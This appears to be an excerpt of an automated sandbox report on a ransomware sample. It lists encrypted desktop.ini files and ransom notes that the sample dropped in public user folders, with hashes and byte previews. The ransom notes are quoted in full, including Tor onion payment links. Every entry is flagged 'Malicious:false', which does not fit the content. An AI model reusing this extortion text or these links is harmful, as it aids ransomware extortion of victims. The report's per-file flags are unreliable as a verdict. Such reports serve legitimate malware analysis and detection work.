                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.59935998650058
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:uzF5WpSg4X6rzK8sevWAVgKTaCB7RZ0cHYIgtyUz1:uH0przCwgck38I
                                                                                                                                                      MD5:ACA8FA622B6B7C6CEBA55CDFD4F98871
                                                                                                                                                      SHA1:B5E2ACC20AA524A278A34EE6EC4F18CE387F59F5
                                                                                                                                                      SHA-256:A3D0727D2D491B12998B77C0C2F21E73F12800C325CB84E34C6883B60552CB79
                                                                                                                                                      SHA-512:47A07462DD4C51A1CB86D011B3598864CFA081AECD8593CA8E6A482D814DD1252F7F5D6773EF3EDD0DE61CD163CB8BE8D970CE6E29E1D22B2862A7B71C28F1C4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: p.Q......A.m.<..(...g..$A..Wc`].N=.D.......5k.,...I..]B.u..@.8.b........y.i..]u.;Tv....@!....(...S..pf....../.L!..<....]..H....7".2"...E.~..Mm.=\..?..J.|u.?[.b./.<..^\.i.zo!.Lv..A...>..D..D..g....y..C...T...'......S.4, .........3M.;$Q...w.e.<k......e..*....2.!wSQ/.S?.e\v...(.WlN...L.qJ.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\Public\Libraries\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.59935998650058
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:uzF5WpSg4X6rzK8sevWAVgKTaCB7RZ0cHYIgtyUz1:uH0przCwgck38I
                                                                                                                                                      MD5:ACA8FA622B6B7C6CEBA55CDFD4F98871
                                                                                                                                                      SHA1:B5E2ACC20AA524A278A34EE6EC4F18CE387F59F5
                                                                                                                                                      SHA-256:A3D0727D2D491B12998B77C0C2F21E73F12800C325CB84E34C6883B60552CB79
                                                                                                                                                      SHA-512:47A07462DD4C51A1CB86D011B3598864CFA081AECD8593CA8E6A482D814DD1252F7F5D6773EF3EDD0DE61CD163CB8BE8D970CE6E29E1D22B2862A7B71C28F1C4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: p.Q......A.m.<..(...g..$A..Wc`].N=.D.......5k.,...I..]B.u..@.8.b........y.i..]u.;Tv....@!....(...S..pf....../.L!..<....]..H....7".2"...E.~..Mm.=\..?..J.|u.?[.b./.<..^\.i.zo!.Lv..A...>..D..D..g....y..C...T...'......S.4, .........3M.;$Q...w.e.<k......e..*....2.!wSQ/.S?.e\v...(.WlN...L.qJ.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\Public\Libraries\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\Public\Music\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1328
                                                                                                                                                      Entropy (8bit):6.165794022974002
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:4kLvxuEFFMi9lZ/vOAJXZxwVPzK8sevWAVgKTaCB7RZ0cHYIgtyUzJX:43EFFbZ/nlZCVPzCwgck38E
                                                                                                                                                      MD5:73856BE75A8A0386CE4A769A2CF7A24D
                                                                                                                                                      SHA1:873C6A4EA38891CBEE03D5B8CC156F16015D3B93
                                                                                                                                                      SHA-256:475FCC1AC7710D30BB56978B7370E231969DA5DE9687967BDC0606019146BDA8
                                                                                                                                                      SHA-512:55E7AE9FE1039B021797F498AD331C3B2487D6E599F254CBA93DF615B646DA33E4432EBB0A22371A28890609CD350584CF2329B40ED51D02993B7D830DEEBED4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....b...w....>...:...Kn.nI...O..6}....B..oS..E.k.k.....w.N,..L.w...3.Fb.."B...r....ZIb.A.RF.....D.V.....(Q..(.*Wl...r.x...)..w....7..&.&}....YkR...S..>.....v.....,*..e..g.../kIU...U....9...(".0..x.3F|e/gw.S........Bw........-...M#-6&8f.*!......._....(.......{R........r,..*...S.)..L.2..KZ.f......\..T75'..(.k.V.3;K...f...(..N..`>B`G.[/....,A.(4:.)..(...u..M..^-.%S...7g;ssc.S.......D.C.+.>.T:&....A..7......r...C......../..J.P.......R~..*.kQ....Xh....{.........w......]......RI..ko..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF
                                                                                                                                                      C:\Users\Public\Music\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1328
                                                                                                                                                      Entropy (8bit):6.165794022974002
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:4kLvxuEFFMi9lZ/vOAJXZxwVPzK8sevWAVgKTaCB7RZ0cHYIgtyUzJX:43EFFbZ/nlZCVPzCwgck38E
                                                                                                                                                      MD5:73856BE75A8A0386CE4A769A2CF7A24D
                                                                                                                                                      SHA1:873C6A4EA38891CBEE03D5B8CC156F16015D3B93
                                                                                                                                                      SHA-256:475FCC1AC7710D30BB56978B7370E231969DA5DE9687967BDC0606019146BDA8
                                                                                                                                                      SHA-512:55E7AE9FE1039B021797F498AD331C3B2487D6E599F254CBA93DF615B646DA33E4432EBB0A22371A28890609CD350584CF2329B40ED51D02993B7D830DEEBED4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....b...w....>...:...Kn.nI...O..6}....B..oS..E.k.k.....w.N,..L.w...3.Fb.."B...r....ZIb.A.RF.....D.V.....(Q..(.*Wl...r.x...)..w....7..&.&}....YkR...S..>.....v.....,*..e..g.../kIU...U....9...(".0..x.3F|e/gw.S........Bw........-...M#-6&8f.*!......._....(.......{R........r,..*...S.)..L.2..KZ.f......\..T75'..(.k.V.3;K...f...(..N..`>B`G.[/....,A.(4:.)..(...u..M..^-.%S...7g;ssc.S.......D.C.+.>.T:&....A..7......r...C......../..J.P.......R~..*.kQ....Xh....{.........w......]......RI..ko..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF
                                                                                                                                                      C:\Users\Public\Music\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\Public\Pictures\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1328
                                                                                                                                                      Entropy (8bit):6.156420275366519
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:OuZkhOJbYiGEAxUFxVlzByqzK8sevWAVgKTaCB7RZ0cHYIgtyUz54:Ou6hOJbYiGEPdFnzCwgck38n
                                                                                                                                                      MD5:8C1502831E869FE4197B67848B80CE3F
                                                                                                                                                      SHA1:16669BFEEDCEC95E8718AB20694027B40739EF7D
                                                                                                                                                      SHA-256:2C9EF8D34CAD25AA6107F9931C6F96B5B679E741437625DA49A13E677886F673
                                                                                                                                                      SHA-512:737E86A85B2E67E0EA379A386093A4F8D7CABCDBF579EC7F2DCD8C03A803E7C01240CF6189742D97D7B5C0428E3B7BE235089E6FEB6988EDB1BD574A918CD625
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: =.>8.]0..KPP..A^...+....\..M...0...$..-.M.2...........PP|.=R+......NW.nw.......!uu...&.T..,..(.w.W.0..v1.}.#.P..4.${..}n..u.r.....k...(..6N.y.f.p8....SB+u.4z.hF]..b.Z.BO.1..;y.g3P.N.}........j.m..r.x..>RJ..8....8.R.......01._.....P\...h8b...'.Om..Q...b.'_.S....-3.Ft...v7^.I..B.+.V...'...B...^i`v5.s....I..2 .....D.......9....[N..].......'......r....n...........U[...>.D.....%....M/....Y....mb.U.c.....x....R..G...e.v&.J.e.<V.@"884.;U..EM5.vm..a.......G_.......-F. x....l...@V.Fa+....kp.-.....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF
                                                                                                                                                      C:\Users\Public\Pictures\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1328
                                                                                                                                                      Entropy (8bit):6.156420275366519
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:OuZkhOJbYiGEAxUFxVlzByqzK8sevWAVgKTaCB7RZ0cHYIgtyUz54:Ou6hOJbYiGEPdFnzCwgck38n
                                                                                                                                                      MD5:8C1502831E869FE4197B67848B80CE3F
                                                                                                                                                      SHA1:16669BFEEDCEC95E8718AB20694027B40739EF7D
                                                                                                                                                      SHA-256:2C9EF8D34CAD25AA6107F9931C6F96B5B679E741437625DA49A13E677886F673
                                                                                                                                                      SHA-512:737E86A85B2E67E0EA379A386093A4F8D7CABCDBF579EC7F2DCD8C03A803E7C01240CF6189742D97D7B5C0428E3B7BE235089E6FEB6988EDB1BD574A918CD625
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: =.>8.]0..KPP..A^...+....\..M...0...$..-.M.2...........PP|.=R+......NW.nw.......!uu...&.T..,..(.w.W.0..v1.}.#.P..4.${..}n..u.r.....k...(..6N.y.f.p8....SB+u.4z.hF]..b.Z.BO.1..;y.g3P.N.}........j.m..r.x..>RJ..8....8.R.......01._.....P\...h8b...'.Om..Q...b.'_.S....-3.Ft...v7^.I..B.+.V...'...B...^i`v5.s....I..2 .....D.......9....[N..].......'......r....n...........U[...>.D.....%....M/....Y....mb.U.c.....x....R..G...e.v&.J.e.<V.@"884.;U..EM5.vm..a.......G_.......-F. x....l...@V.Fa+....kp.-.....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF
                                                                                                                                                      C:\Users\Public\Pictures\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\Public\Videos\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1328
                                                                                                                                                      Entropy (8bit):6.161650149312568
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:v+VPHbqNu763+HsLNmwwxzK8sevWAVgKTaCB7RZ0cHYIgtyUzngp:42M+3bLYbzCwgck388gp
                                                                                                                                                      MD5:A6D305B913DB51DF5E5A5CF4A9DB4E42
                                                                                                                                                      SHA1:F6F8F32EC388555A843F30F6962F23D07577C152
                                                                                                                                                      SHA-256:3261BFC601AAE7364A3B8AEE71B968913F25C59FAA74FB27D5F019DA8059051B
                                                                                                                                                      SHA-512:3A368C543D94C4111C9AF806EFE43C1228D26E8D3AF736F7E445753BF78DA065852B641E75197EB9AF860179EF6687B4AA3A2CEFD69B94A2FB50AB4B5812366B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .ny;5.S[QSo.J/>]p...bh.....0|....t.E;XV.].4..&3R.F..|7A.Yw.Uw...0 ..#...q..\..|,P.'..2n@3.F?.(..."V..<6....].E2iLS8M|v..an.e=.{..m+z.N......\.?..o.c..2..!....&+u\.-.iF..%..9.r.../..bu......S......""/As.J../...^a....F.*@.@C.;."...dGel.._..4b[...O.Q....[.gw..b..n....'...K........>.9o.Se.u..Q../G^.Sk.T.8..9..'=..l.......h...?.A.]..5_E...=.D..j*..5ar\..E>".....P....!....I.Gb..,BH..A....U..x@.z|.R9..Y7.[..}.)@.qF.y...tT.... Y.^...p.b-.W._=.,].....]...J3h...A...*&.(:c.&.E....3w....Ocf67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF
                                                                                                                                                      C:\Users\Public\Videos\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1328
                                                                                                                                                      Entropy (8bit):6.161650149312568
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:v+VPHbqNu763+HsLNmwwxzK8sevWAVgKTaCB7RZ0cHYIgtyUzngp:42M+3bLYbzCwgck388gp
                                                                                                                                                      MD5:A6D305B913DB51DF5E5A5CF4A9DB4E42
                                                                                                                                                      SHA1:F6F8F32EC388555A843F30F6962F23D07577C152
                                                                                                                                                      SHA-256:3261BFC601AAE7364A3B8AEE71B968913F25C59FAA74FB27D5F019DA8059051B
                                                                                                                                                      SHA-512:3A368C543D94C4111C9AF806EFE43C1228D26E8D3AF736F7E445753BF78DA065852B641E75197EB9AF860179EF6687B4AA3A2CEFD69B94A2FB50AB4B5812366B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .ny;5.S[QSo.J/>]p...bh.....0|....t.E;XV.].4..&3R.F..|7A.Yw.Uw...0 ..#...q..\..|,P.'..2n@3.F?.(..."V..<6....].E2iLS8M|v..an.e=.{..m+z.N......\.?..o.c..2..!....&+u\.-.iF..%..9.r.../..bu......S......""/As.J../...^a....F.*@.@C.;."...dGel.._..4b[...O.Q....[.gw..b..n....'...K........>.9o.Se.u..Q../G^.Sk.T.8..9..'=..l.......h...?.A.]..5_E...=.D..j*..5ar\..E>".....P....!....I.Gb..,BH..A....U..x@.z|.R9..Y7.[..}.)@.qF.y...tT.... Y.^...p.b-.W._=.,].....]...J3h...A...*&.(:c.&.E....3w....Ocf67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF
                                                                                                                                                      C:\Users\Public\Videos\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\Public\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.585586390583736
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:7Vl8R2ZzK8sevWAVgKTaCB7RZ0cHYIgtyUz8d6V:7Va4ZzCwgck38I
                                                                                                                                                      MD5:05925434824B1D0C4B5D196C7DF5314C
                                                                                                                                                      SHA1:52767C7BE2443D69349428CD23C7BD19B07E66B9
                                                                                                                                                      SHA-256:841612524B253FBDC8225751A5A25B6A8D1EBA0D5579C3FB14BFB137ADA96E20
                                                                                                                                                      SHA-512:3FA133D21A1E83429D40B42E50ABDBD25216552600907E6E3EE813154986D4A068004EBE1CE5CA32DA5A9C97BFD664DC9E465CD5DBC18A1754D3D87EAB8FFFC0
                                                                                                                                                      Malicious:false
